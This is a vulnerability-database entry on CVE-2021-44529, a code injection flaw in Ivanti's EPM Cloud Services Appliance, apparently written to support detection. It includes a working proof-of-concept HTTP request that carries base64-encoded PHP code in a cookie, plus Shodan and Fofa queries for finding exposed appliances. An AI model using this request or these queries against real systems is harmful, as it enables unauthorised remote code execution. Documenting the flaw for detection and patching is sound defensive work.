🔙 목록으로 돌아가기

CVE-2021-44529: Ivanti EPM Cloud Services Appliance Code Injection

TitleIvanti EPM Cloud Services Appliance Code Injection
Authorduty_1g,phyr3wall,Tirtha
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could lead to remote code execution and compromise of the affected system.
RemediationApply the latest security patches provided by Ivanti to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.94461
CVE IDCVE-2021-44529
CWE IDCWE-94
Shodan Querytitle:"LANDesk(R) Cloud Services Appliance"http.title:"landesk(r) cloud services appliance"
Fofa Querytitle="landesk(r) cloud services appliance"
Tags cve2021 cve ivanti epm csa injection packetstorm kev vkev vuln

🔍 Vulnerability Description

Ivanti EPM Cloud Services Appliance (CSA) before version 4.6.0-512 is susceptible to a code injection vulnerability because it allows an unauthenticated user to execute arbitrary code with limited permissions (nobody).

🌐 HTTP Request

GET /client/index.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Cookie: ab=ab; c=cGhwaW5mbygpOw==; d=; e=;
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-44529.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-44529.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A